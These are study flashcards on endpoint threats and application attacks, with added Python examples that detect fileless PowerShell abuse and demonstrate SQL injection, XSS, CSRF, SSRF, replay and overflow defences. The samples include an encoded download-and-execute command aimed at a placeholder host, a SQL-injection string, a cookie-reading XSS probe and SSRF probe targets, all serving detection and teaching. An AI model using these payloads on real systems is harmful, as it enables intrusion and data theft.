Module 3 - Threats & Attacks on Endpoints Flashcards

1
Q

What word is currently accepted when referring to network-connected hardware devices?

A

endpoint

this term reflects the fact that the devices connected to a network today are far more varied than a computing device with a keyboard and monitor

2
Q

What are the five groupings used to characterize malware?

A

imprison - ex: ransomware, cryptomalware

launch - ex: virus, worm, bot

snoop - ex: spyware, keylogger

deceive - ex: PUPs, trojan, RAT

evade - ex: backdoor, logic bomb, rootkit

3
Q

Gabriel’s sister called him about a message that suddenly appeared on her screen that says her software license has expired and she must immediately pay $500 to have it renewed before control of her computer is returned to her. What type of malware has infected her computer?

A

blocking ransomware

blocking ransomware is one of the earlier forms of ransomware: it locks the user out of the device (here with a fake expired-license notice and a demand for payment) rather than encrypting files

4
Q

Marius’s team leader has just texted him that an employee has just reported that her computer is sudden locked up with cryptomalware. Why would Marius consider this a dangerous situation?

A

cryptomalware does not stop at the infected host: newer variants encrypt files on any network share or attached device reachable from the employee's computer, not just the local drive

basically any other endpoint whose storage the infected computer can reach is at risk, so the machine should be isolated from the network immediately

5
Q

Which type of malware relies on LOLBins?

A

file-less virus

a file-less virus does not attach itself to a file the way a file-based virus does; it takes advantage of native services and processes that are part of the OS to avoid detection and carry out its attacks; the native services abused by a file-less virus are called living-off-the-land binaries (LOLBins)

6
Q

Which type of malware is known as a network virus?

A

a worm

a worm is a malicious program that uses a computer network to replicate; it is designed to enter a computer through the network and then take advantage of a vulnerability in an application or an OS on the host computer; once the worm has exploited the vulnerability on one system, it immediately searches for another computer on the network that has the same vulnerability

7
Q

What are some examples of different attacks generated through a botnet?

A
spamming
spreading malware
ad fraud
mining cryptocurrencies
distributed denial of service (DDoS)
denial of service (DoS)
8
Q

What are some ways a bot communicates with a C & C device?

A

1) by signing in to a bot-herding website where information has been placed that the bot knows how to interpret
2) by signing in to a third-party website
3) through commands sent via blog posts, specially coded attack commands in Twitter posts, or notes posted on Facebook
4) through an email account created by the attacker, in which a draft is written but never sent; the bot logs in to the account and reads the commands from the draft

9
Q

Randall’s roommate is complaining to him about all of the software that came pre-installed on his new computer. What type of software is this?

A

PUP (Potentially Unwanted Programs)

10
Q

What is the difference between a Trojan and Remote Access Trojan (RAT)?

A

a RAT gives the attacker unauthorized remote access to the victim's computer

a computer Trojan is an executable program that masquerades as performing a benign activity but also does something malicious; ex) a user might download what is advertised as a calendar program, yet in addition to installing the calendar, it also installs malware that scans the system for credit card numbers and passwords, connects through the network to a remote system, and then transmits that information to the attacker

a remote access Trojan has the basic functionality of a Trojan but also gives the threat actor unauthorized remote access to the victim's computer by using specially configured communication protocols

11
Q

Which of these would NOT be considered the result of a logic bomb?

a) send an email to Rowan’s inbox each Monday morning with the agenda of that week’s department meeting
b) if the company’s stock price drops below $50, then credit Oscar’s retirement account with one additional year of retirement credit
c) erase the hard drives of all the servers 90 days after Alfredo's name is removed from the list of current employees
d) delete all human resource records regarding Augustine one month after he leaves the company

A

A) send an email to Rowan’s inbox each Monday morning with the agenda of that week’s department meeting

12
Q

Which of the following attacks is based on a website accepting user input without sanitizing it?

a) RSS
b) XSS
c) SQLS
d) SSXRS

A

B) XSS - cross site scripting attack

13
Q

Which of the following attacks is based on the principle that when a user is currently authenticated on a website and then loads another webpage, the new page inherits the identity and privileges of the first website?

a) SSFR
b) DLLS
c) CSRF
d) DRCR

A

C) CSRF - cross-site request forgery attack

14
Q

Which of the following manipulates the trusting relationship between web servers?

a) SSRF
b) CSRF
c) EXMAL
d) SCSI

A

A) SSRF - server-side request forgery attack

15
Q

Which type of memory vulnerability attack manipulates the "return address" memory location of a software program?

a) shim overflow attack
b) factor overflow attack
c) integer overflow attack
d) buffer overflow attack

A

D) buffer overflow attack

16
Q

What race condition can result in a NULL pointer/object dereference?

a) conflict race condition
b) value-based race condition
c) threat race condition
d) time of check/time of use race condition

A

D) time of check/time of use race condition

17
Q

Which of the following attacks targets the external software component that is a repository of both code and data?

a) application program interface (API) attack
b) device driver manipulation attack
c) dynamic-link library (DLL) injection attack
d) OS REG attack

A

C) dynamic-link library (DLL) injection attack

18
Q

What term refers to changing the design of existing code?

a) library manipulation
b) shimming
c) refactoring
d) design driver manipulation

A

C) refactoring

19
Q

Which of the following is technology that imitates human abilities?

a) AI
b) ML
c) RC
d) XLS

A

A) artificial intelligence (AI)

20
Q

Which statement regarding keylogger is NOT true?

a) software keyloggers can be designed to send captured information automatically back to the attacker through the internet
b) hardware keyloggers are installed between the keyboard and the computer's USB port
c) software keyloggers are generally easy to detect
d) keyloggers can be used to capture passwords , credit card numbers, or personal information

A

C) software keyloggers are generally easy to detect

21
Q

What are some examples of malware used to “imprison” a user/system?

A

1) ransomware - one of the fastest growing types of malware; ransomware prevents a user's endpoint device from properly and fully functioning until a fee is paid; that is, it takes away the user's freedom to use their computer until the ransom is paid
2) cryptomalware - a more recent form of ransomware that, instead of blocking users from accessing the computer, encrypts all the files on the device so that none of them can be opened; new variants of cryptomalware can encrypt all files on any network share or attached device connected to the infected computer

22
Q

What are some examples of malware used to “launch” attacks on other computers/systems?

A

File-based virus - malicious computer code that attaches itself to a file; a file-based virus reproduces itself on the same computer without any human intervention; each time the infected program is launched or the data file is opened - either by the user or by the computer's operating system (OS) - the virus first unloads a payload to perform a malicious action, then reproduces itself by inserting its code into another file, but only on the same computer; a file-based virus can only be transmitted to another device when a user transfers the infected file

File-less virus - does not attach itself to a file on a computer; instead it takes advantage of native services and processes that are part of the OS to avoid detection and carry out its attacks; these native services used by a file-less virus are called living-off-the-land binaries (LOLBins); unlike a file-based virus, a file-less virus does not infect a file and wait for that file to be launched; instead, the malicious code of a file-less virus is loaded directly into the computer's random access memory (RAM) through the LOLBins and then executed; the advantages of a file-less virus over a file-based virus are

1) easy to infect - does not require a particular file type stored on the hard drive in order to infect a computer; instead a common delivery method is a malicious webpage that the user visits; the page silently sends a script to the victim's web browser, which invokes a scripting language such as JavaScript; the browser passes instructions to a LOLBin such as PowerShell, which reads and executes the commands
2) extensive control - several LOLBins have extensive control and authority on a computer; ex) PowerShell has full access to the core OS of a Windows computer, so it can undermine existing security features; PowerShell can also manipulate user accounts and password protection
3) persistent - a program loaded into RAM for execution terminates once the computer is shut down or rebooted; however, file-less viruses often write their script into the Windows Registry, the database that stores settings for the Windows OS and application programs; each time the computer is restarted, or on a set schedule, the script of the file-less virus is launched again
4) difficult to detect - because the virus is loaded directly into RAM rather than written to disk, there is no telltale infected file for a scanner to examine
5) difficult to defend against - to fully defend against a file-less virus it would be necessary to turn off all the potential LOLBins, which would cripple the OS and cause it to stop functioning properly

Worm
a worm is a malicious program that uses a computer network to replicate; a worm is designed to enter a computer through the network and then take advantage of a vulnerability in an application or an OS on the host computer; once the worm has exploited the vulnerability on one system, it immediately searches for another computer on the network that has the same vulnerability; also known as a network virus

Bot
software that allows the infected computer to be placed under the remote control of an attacker for the purpose of launching attacks; this infected robot computer is known as a bot or zombie; infected bot computers receive instructions through a command and control (C&C) structure from the bot herder(s) regarding which computers to attack and how
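Because a file-less virus leaves no file to scan, detection has to come from telemetry about what the LOLBins themselves are doing: which process launched them, whether the command line is encoded, and whether the window was hidden. The following is an added example, not code from the flashcards' source, that runs such logic over a few constructed process-creation records shaped like Sysmon Event ID 1 fields (ParentImage, Image, CommandLine). The LOLBin list, the suspicious-parent list, the payload markers and the sample events are this example's own assumptions, and the base64 payload is built in code from a string pointing at the reserved name example.invalid.

```python
"""Detection logic for fileless (LOLBin) activity over constructed
process-creation records. Added example; not from the flashcards' source.
The lists, markers and sample events are this example's own assumptions."""
import base64
import binascii
import re

# Native binaries commonly abused as LOLBins (assumption: a starter list, not exhaustive).
LOLBINS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "rundll32.exe",
           "regsvr32.exe", "wscript.exe", "cscript.exe", "certutil.exe", "bitsadmin.exe"}
# Parents that should rarely spawn a LOLBin: document readers and browsers (assumption).
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                      "acrord32.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
# PowerShell accepts any unambiguous prefix of -EncodedCommand; cover the common spellings.
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")
HIDDEN_FLAG = re.compile(r"(?i)\s-w(?:indowstyle)?\s+hidden\b")
PAYLOAD_MARKERS = ("iex", "invoke-expression", "downloadstring", "frombase64string", "webclient")

# Constructed payload and events (not real telemetry). PowerShell -EncodedCommand is
# base64 over UTF-16LE text, so the sample is encoded the same way.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode("ascii")
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -NoProfile Get-ChildItem C:\Users"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell.exe -NoP -W Hidden -enc {ENCODED}"},
    {"ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c start notepad.exe"},
    {"ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": "rundll32.exe C:\\Windows\\System32\\shell32.dll,Control_RunDLL"},
]


def basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand text, or None if absent or malformed."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def analyze_event(ev):
    """Return the reasons this event looks like LOLBin abuse (empty list = not flagged)."""
    image, parent = basename(ev["Image"]), basename(ev["ParentImage"])
    if image not in LOLBINS:
        return []
    reasons = []
    if parent in SUSPICIOUS_PARENTS:
        reasons.append(f"{image} spawned by {parent}")
    decoded = decode_encoded_command(ev["CommandLine"])
    if decoded is not None:
        reasons.append("encoded command line")
        hits = [mk for mk in PAYLOAD_MARKERS if mk in decoded.lower()]
        if hits:
            reasons.append("decoded payload contains " + ", ".join(hits))
    if HIDDEN_FLAG.search(ev["CommandLine"]):
        reasons.append("hidden window")
    return reasons


def scan(events):
    """Map event index -> reasons, for the events that were flagged."""
    findings = {}
    for i, ev in enumerate(events):
        reasons = analyze_event(ev)
        if reasons:
            findings[i] = reasons
    return findings


if __name__ == "__main__":
    for i, reasons in scan(SAMPLE_EVENTS).items():
        print(i, SAMPLE_EVENTS[i]["CommandLine"][:60], "->", "; ".join(reasons))
```

The point of decoding rather than just flagging the `-enc` switch is that the decoded text is where the download-and-execute intent shows up; the benign PowerShell launched from explorer.exe in the first record is left alone, while the same binary launched by Word with an encoded, hidden-window command is flagged on several grounds at once.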

23
Q

What are some examples of malware used to “snoop” on a user/system?

A

Spyware - tracking software that is deployed without the consent or control of the user; spyware can secretly monitor users by collecting information without their approval, using the computer's resources, including programs already installed on the computer, to collect and distribute personal or sensitive information

Keylogger - can be a software program or a hardware device that silently captures and stores each keystroke that a user types on the computer's keyboard; software keyloggers can go beyond just capturing keystrokes: they can also capture everything on the user's screen and silently turn on the computer's web camera to record images of the user; the advantage of a software keylogger over a hardware keylogger is that the threat actor does not have to physically access the user's computer, because the software can be installed remotely and then routinely send captured information back to the threat actor through the victim's own internet connection

24
Q

What are some examples of malware used to “deceive” a user/system?

A

Potentially Unwanted Programs (PUPs) - software that the user does not want on their computer; PUPs often become installed along with other programs and are the result of the user overlooking the default installation options on software downloads; PUPs may include software that comes preloaded on a new computer or smartphone and cannot be easily removed (if at all); other forms of PUPs are pop-up windows, pop-under windows, search engine hijacking, home page hijacking, toolbars with no value for the user, and settings that redirect to competitors' websites, alter search results, and replace ads on webpages

Trojan - a computer Trojan is an executable program that masquerades as performing a benign activity but also does something malicious

Remote Access Trojan (RAT) - a special type of Trojan that has the same basic functionality as a Trojan but also gives the threat actor unauthorized remote access to the victim's computer by using specially configured communication protocols; this creates an opening into the victim's computer, allowing the threat actor unrestricted access

25
Q

What are some examples of malware used to “evade” a user/system?

A

backdoor - gives access to a computer, program, or service that circumvents the normal security protections; a backdoor installed on a computer allows an attacker to return later and bypass security settings

logic bomb - computer code that is typically added to a legitimate program but lies dormant and evades detection until a specific logical event triggers it; once triggered, the logic bomb performs its intended malicious action

rootkit - malware that hides its presence and the presence of other malware on the computer; it does this by accessing the "lower layers" of the operating system, even using undocumented functions to make alterations; this makes the rootkit and any accompanying software undetectable by the operating system and by common anti-malware scanners designed to seek and find malware

26
Q

What are some risks associated with using artificial intelligence and machine learning in cybersecurity?

A

known as adversarial artificial intelligence, defined as exploiting the risks associated with artificial intelligence and machine learning; the first risk is the security of the machine learning algorithm itself; just as all hardware and software is subject to infiltration by threat actors, AI-powered cybersecurity applications and the devices they run on likewise have vulnerabilities; these could be attacked and compromised, allowing threat actors to alter the algorithms so that they ignore attacks, much like a rootkit can instruct an OS to ignore malicious actions

another risk is tainted training data for machine learning; attackers can attempt to alter (poison) the training data used by a machine learning model so that it produces false negatives, cloaking the attacker's activity

27
Q

What is a cross-site scripting (XSS) attack?

A

an application attack in which a website accepts user input without validating it (called sanitizing) and then uses that input in a response, where it can be exploited; typically the unvalidated input is reflected into a webpage as script that then runs in other users' browsers

28
Q

What are some examples of “injection” application attacks?

A

SQL injection - one of the most common injection attacks; it inserts statements to manipulate a database server; SQL stands for 'Structured Query Language', a language used to view and manipulate data stored in a relational database

XML injection - XML stands for 'Extensible Markup Language'; XML is a markup language for structured data rather than a database engine, but many data stores and application messages are XML-based; XML injection uses the same principle as SQL injection but targets the XML documents and XML-based queries the application processes (which are not relational SQL databases) rather than a SQL server

these attacks can be thwarted as long as the input is properly sanitized (validated) and, for SQL, passed to the database through parameterized queries rather than concatenated into the statement text
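To make the sanitizing point in cards 27 and 28 concrete, here is an added example (not code from the flashcards' source) that runs the same login lookup two ways against an in-memory SQLite table of constructed rows, once with the input concatenated into the statement and once parameterized, and then shows the output-encoding step that stops a reflected XSS payload from running. The table, its columns and rows, the greeting markup and the probe strings are this example's own assumptions; passwords are stored in clear only to keep the demo short, and a real system stores password hashes.

```python
"""SQL injection versus a parameterized query, plus HTML escaping against
reflected XSS. Added example; not from the flashcards' source. The users
table, its rows and the greeting template are this example's own."""
import html
import sqlite3


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "correct horse"), ("bob", "hunter2")])  # constructed rows
    return conn


def login_vulnerable(conn, username, password):
    """Input is pasted into the statement text, so the database cannot tell
    where the developer's SQL ends and the attacker's input begins."""
    query = (f"SELECT username FROM users WHERE username = '{username}' "
             f"AND password = '{password}'")
    return sorted(row[0] for row in conn.execute(query))


def login_parameterized(conn, username, password):
    """The statement is fixed; values travel separately, so a quote or a
    comment marker in the input is just characters inside a value."""
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return sorted(row[0] for row in conn.execute(query, (username, password)))


# Classic payload: closes the string, adds an always-true clause, comments out the rest.
INJECTION = "' OR '1'='1' --"


def render_greeting_vulnerable(name):
    """Reflects user input into HTML unchanged: a <script> in the name runs in the browser."""
    return f"<p>Hello, {name}!</p>"


def render_greeting_escaped(name):
    """Encodes the HTML metacharacters so the input is displayed, not executed."""
    return f"<p>Hello, {html.escape(name, quote=True)}!</p>"


XSS_PROBE = "<script>alert(document.cookie)</script>"


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, injected   :", login_vulnerable(db, INJECTION, "x"))
    print("parameterized, injected:", login_parameterized(db, INJECTION, "x"))
    print("parameterized, legit   :", login_parameterized(db, "alice", "correct horse"))
    print(render_greeting_vulnerable(XSS_PROBE))
    print(render_greeting_escaped(XSS_PROBE))
```

With the injected username the concatenated statement becomes `... WHERE username = '' OR '1'='1' --' AND password = 'x'`: the password check is commented away and every user is returned, while the parameterized version finds no row because it looks for a user literally named `' OR '1'='1' --`.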

29
Q

What are some examples of “request forgery” application attacks?

A

cross-site request forgery (CSRF) - takes advantage of the authentication "token" (typically the session cookie) that a website sends to a user's web browser and that the browser attaches to every request to that site; if the user is currently authenticated on a website and is then tricked into loading another webpage, requests from the new page inherit the identity and privileges of the victim, so the attacker's page can make the victim's browser perform an undesired action on the site on the attacker's behalf; because this type of request forgery takes place on the client side it is sometimes referred to as a client-side request forgery

server-side request forgery (SSRF) - takes advantage of a trusting relationship between web servers (as opposed to a CSRF, which manipulates the trust from a user's web browser to a server); an SSRF attack exploits the server's willingness to fetch a URL on the attacker's behalf: some web applications read information from or write information to a URL supplied in the request, and if an attacker can modify that target URL they can make the server reach systems that are not exposed to the attacker directly, potentially extracting sensitive information from the application or injecting untrusted input into it
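The two forgeries are defeated by two different checks, and the following added example (not code from the flashcards' source) shows both: a per-session synchronizer token that a cross-site page cannot read, compared in constant time, and validation of an outbound fetch target that refuses non-HTTP schemes, credentials in the URL, literal IP addresses and any allowlisted name that resolves to a private, loopback or link-local address. The session dict, the allowlist and the resolver that answers from a constructed table (so the example runs offline) are this example's own assumptions.

```python
"""CSRF synchronizer token and SSRF target validation. Added example; not
from the flashcards' source. Session store, allowlist and DNS answers are
this example's own assumptions."""
import hmac
import ipaddress
import secrets
from urllib.parse import urlsplit


# --- CSRF: synchronizer token ---------------------------------------------
def issue_csrf_token(session):
    """Store a fresh random token in the server-side session and return it for the form."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def verify_csrf(session, submitted):
    """True only if the token submitted with the form matches the session's token."""
    expected = session.get("csrf_token")
    if not expected or not submitted:
        return False
    return hmac.compare_digest(expected, submitted)  # constant-time comparison


# --- SSRF: outbound fetch target validation --------------------------------
ALLOWED_HOSTS = {"api.example.com", "cdn.example.com"}  # assumption


def is_internal_address(ip_text):
    """Addresses a server must never be tricked into contacting on a user's behalf."""
    ip = ipaddress.ip_address(ip_text)
    return (ip.is_private or ip.is_loopback or ip.is_link_local  # 169.254.169.254 metadata
            or ip.is_reserved or ip.is_multicast or ip.is_unspecified)


def is_safe_fetch_target(url, resolve):
    """resolve(hostname) -> list of IP strings; injected so the check runs offline."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False                        # file://, gopher://, ftp:// are never fetched
    if parts.username or parts.password:    # https://api.example.com@127.0.0.1/ tricks
        return False
    host = parts.hostname
    if not host:
        return False
    try:
        ipaddress.ip_address(host)
        return False                        # literal IPs sidestep the name allowlist
    except ValueError:
        pass
    host = host.lower()
    if host not in ALLOWED_HOSTS:
        return False
    addrs = resolve(host)
    return bool(addrs) and not any(is_internal_address(a) for a in addrs)


# Constructed DNS answers: cdn.example.com has been pointed at an internal host.
FAKE_DNS = {"api.example.com": ["93.184.216.34"], "cdn.example.com": ["10.0.0.5"]}


def fake_resolve(host):
    return FAKE_DNS.get(host, [])


if __name__ == "__main__":
    session = {}
    token = issue_csrf_token(session)
    print("csrf ok:", verify_csrf(session, token), "forged:", verify_csrf(session, "guess"))
    for target in ("https://api.example.com/v1/items", "http://169.254.169.254/latest/meta-data/",
                   "file:///etc/passwd", "https://cdn.example.com/x.js",
                   "https://api.example.com@127.0.0.1/"):
        print(target, "->", is_safe_fetch_target(target, fake_resolve))
```

One caveat the resolver injection makes visible: the name is checked at one moment and connected to at another, so a host whose DNS answer changes in between (DNS rebinding) still reaches an internal address unless the fetch connects to the very address that was validated and re-validates on every redirect.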

30
Q

How does a replay attack work?

A

a replay attack captures data and then reuses it for an attack; replay attacks are commonly used against digital identities: after intercepting and copying data, the threat actor re-transmits selected and edited portions of the copied communications later to impersonate the legitimate user; many digital identity replay attacks are between a user and an authentication server
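The card's point is that a message can be perfectly authentic and still be an attack if it is old. The added example below (not code from the flashcards' source) builds a login message protected by an HMAC over the user, a timestamp and a nonce; a server that checks only the MAC accepts the captured message again, while a server that also enforces a freshness window and remembers accepted nonces rejects the replay, the stale copy, and an edited copy. The shared key, the 30-second window and the JSON message format are this example's own assumptions.

```python
"""Replay attack against an HMAC-authenticated login, and the nonce plus
freshness-window defence. Added example; not from the flashcards' source.
Key, window and message format are this example's own assumptions."""
import hashlib
import hmac
import json
import secrets

KEY = b"shared-secret-for-demo-only"  # assumption: provisioned out of band


def make_auth_message(user, now, key=KEY):
    """Client side: sign user + timestamp + fresh nonce."""
    body = {"user": user, "ts": int(now), "nonce": secrets.token_hex(8)}
    payload = json.dumps(body, sort_keys=True, separators=(",", ":"))
    mac = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    return {"payload": payload, "mac": mac}


def mac_valid(msg, key=KEY):
    expected = hmac.new(key, msg["payload"].encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, msg["mac"])


class NaiveServer:
    def accept(self, msg, now):
        return mac_valid(msg)  # integrity only: an old valid message stays valid forever


class HardenedServer:
    def __init__(self, window=30):
        self.window = window
        self.seen = {}          # nonce -> timestamp, pruned to the window so it stays bounded

    def accept(self, msg, now):
        if not mac_valid(msg):  # authenticate before parsing anything
            return False
        body = json.loads(msg["payload"])
        if abs(now - body["ts"]) > self.window:
            return False        # stale: outside the freshness window
        self.seen = {n: t for n, t in self.seen.items() if now - t <= self.window}
        if body["nonce"] in self.seen:
            return False        # replay: this nonce was already accepted
        self.seen[body["nonce"]] = body["ts"]
        return True


def tamper(msg, new_user):
    """Attacker edits the captured message (the card's 'edited portions') without the key."""
    body = json.loads(msg["payload"])
    body["user"] = new_user
    return {"payload": json.dumps(body, sort_keys=True, separators=(",", ":")), "mac": msg["mac"]}


def demo(now=1_700_000_000):
    captured = make_auth_message("alice", now)  # sniffed on the wire
    naive, hard = NaiveServer(), HardenedServer()
    return {
        "naive_first": naive.accept(captured, now),
        "naive_replay": naive.accept(captured, now + 5),
        "hard_first": hard.accept(captured, now),
        "hard_replay": hard.accept(captured, now + 5),
        "hard_stale": hard.accept(captured, now + 3600),
        "hard_tampered": hard.accept(tamper(captured, "admin"), now),
    }


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name:14s} accepted={outcome}")
```

The window exists so the nonce table can be pruned: without it the server would have to remember every nonce forever, and with only a window and no nonce table a message could be replayed as often as the attacker likes inside those 30 seconds.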

31
Q

What are some examples of application attacks that exploit memory vulnerabilities?

A

these types of attacks are directed at vulnerabilities with how a program uses RAM; these are often the result of poor techniques (or laziness) by the software developer; some memory-related attacks are called resource exhaustion attacks because they “deplete” parts of memory and thus interfere with the normal operation of the program in RAM

memory leak - when a program is running it normally allocates memory dynamically but, due to a programming error, may not free that memory when finished with it; an attacker can then take advantage of the unexpected program behavior resulting from a low-memory condition

buffer overflow attack - occurs when a process attempts to store data in RAM beyond the boundaries of a fixed-length storage buffer; the extra data overflows into the adjacent memory locations (a buffer overflow); because the area of memory holding the buffer typically also holds the "return address", the location the program resumes at when the current function finishes, an attacker can overflow the buffer with a new address pointing to the attacker's own code

integer overflow attack - on a computer an integer overflow is the condition that occurs when the result of an arithmetic operation, such as addition or multiplication, exceeds the maximum size of the integer type used to store it; when this integer overflow occurs, the stored value wraps around from the maximum value to the minimum value; in an integer overflow attack an attacker uses this wraparound to change the value of a variable to something outside the range the programmer intended, for example making a size check pass while only a tiny buffer is allocated
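Two of these flaws can be made observable from Python through ctypes, and the block below is an added example for that purpose, not code from the flashcards' source. A copy into a fixed 16-byte name field with no bounds check spills into the adjacent is_admin field; the card's return-address overwrite is the same mechanism aimed at the saved return address on the stack instead of a neighbouring field, and is not reproduced here. Separately, a 32-bit size computation wraps so that a request for over a billion elements yields a four-byte allocation size. The record layout, field names and the sample values are this example's own assumptions.

```python
"""Buffer overflow into an adjacent field and a 32-bit integer overflow,
observed through ctypes. Added example; not from the flashcards' source.
The record layout and values are this example's own assumptions."""
import ctypes


class Record(ctypes.Structure):
    _fields_ = [("name", ctypes.c_char * 16),   # fixed-length buffer at offset 0
                ("is_admin", ctypes.c_int32)]    # adjacent field at offset 16


def record_layout():
    return Record.name.offset, Record.is_admin.offset, ctypes.sizeof(Record)


def set_name_vulnerable(rec, data):
    """Copies len(data) bytes at the start of the record with no check against
    the 16-byte field. The demo clamps at sizeof(rec) so the write stays inside
    this object; a C program would keep writing past it. Returns is_admin != 0."""
    n = min(len(data), ctypes.sizeof(rec))
    ctypes.memmove(ctypes.addressof(rec), data, n)
    return rec.is_admin != 0


def set_name_safe(rec, data):
    """Rejects input that cannot fit with a terminating NUL; is_admin is untouched."""
    if len(data) >= Record.name.size:
        return False
    rec.name = data
    return True


UINT32_MAX = 0xFFFF_FFFF


def alloc_size_vulnerable(count, elem_size):
    """Models `uint32_t total = count * elem_size;`: ctypes keeps only the low 32 bits."""
    return ctypes.c_uint32(count * elem_size).value


def alloc_size_safe(count, elem_size):
    """Checks the multiplication before it can wrap (what C's __builtin_mul_overflow does)."""
    if elem_size and count > UINT32_MAX // elem_size:
        raise OverflowError("count * elem_size does not fit in 32 bits")
    return count * elem_size


def demo():
    payload = b"A" * 16 + b"\x01\x00\x00\x00"  # 16 bytes fill name; the next 4 land on is_admin
    rec = Record(b"guest", 0)
    vulnerable_elevated = set_name_vulnerable(rec, payload)
    rec2 = Record(b"guest", 0)
    safe_accepted = set_name_safe(rec2, payload)
    wrapped = alloc_size_vulnerable(0x4000_0001, 4)  # 0x1_0000_0004 -> 4 bytes for 2^30+1 elements
    try:
        alloc_size_safe(0x4000_0001, 4)
        safe_detected = False
    except OverflowError:
        safe_detected = True
    return {"vulnerable_elevated": vulnerable_elevated, "safe_accepted": safe_accepted,
            "safe_is_admin": rec2.is_admin, "wrapped_size": wrapped,
            "safe_detected": safe_detected}


if __name__ == "__main__":
    print("layout (name, is_admin, size):", record_layout())
    for k, v in demo().items():
        print(f"{k:20s} {v}")
```

The overflow payload never mentions is_admin; it simply keeps writing after the sixteenth byte, and whatever sits there is changed. On the stack that "whatever" is the saved return address, which is why the card ties buffer overflows to control of where the program continues.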

32
Q

What are some examples of application attacks that exploit improper exception handling vulnerabilities?

A

improper input handling - software that allows the user to enter data but does not filter or validate that input, thus allowing a malicious action to occur; ex) a webpage on a web server with improper input handling that asks for the user's email address could allow an attacker to instead enter a command that the server then executes

error handling - occurs when software does not properly trap an error condition and thus provides an attacker with underlying access to the computer/system; ex) an attacker enters a string of characters that is much longer than expected; because the software has not been designed to handle this type of event, the program could crash or suddenly halt its execution and then display an underlying OS prompt, giving the attacker access to the computer

NULL pointer/object dereference - (to dereference a pointer is to read the data item at the address the pointer holds) when an application dereferences a pointer that it expects to be valid but that instead has the value NULL, the program typically crashes or exits; a NULL pointer/object dereference can occur through a number of flaws, including simple programming omissions

race condition - a race condition can also lead to a NULL pointer/object dereference; a race condition in software occurs when two concurrent threads of execution access a shared resource at the same time, resulting in unintended consequences; ex) in a program with two threads that have access to the same location in memory, Thread #1 stores the value A in that memory location, but since Thread #2 is also executing, it may overwrite the same memory location with the value Z; when Thread #1 retrieves the stored value, it is given Thread #2's value of Z instead of its own A; a related case is when software checks the state of a resource before using it, but the resource's state changes between the check and the use in a way that invalidates the check; this is called a time of check/time of use (TOCTOU) race condition

33
Q

What are some examples of application attacks that exploit external software component vulnerabilities?

A

application programming interface (API) attack - an API is a link provided by an OS, web browser, or other platform that gives a developer access to resources at a high level; because APIs provide direct access to data and an entry point to an application's functions, they are attractive targets for attackers looking for a way in

device driver manipulation - a device driver is software that controls and operates an external hardware device connected to a computer; device drivers are specific to both the OS and the hardware device; an attacker may use shimming, which is transparently adding a small code library that intercepts the calls between the OS and the device driver, or refactoring, which is changing the design of the existing driver code; both can be difficult to detect yet are a real threat

Dynamic-link Library (DLL) injection - a technique used by attackers to insert code into a running process through a DLL so that the program behaves differently than intended; a dynamic-link library is a repository of both code and data that can be used by more than one program at the same time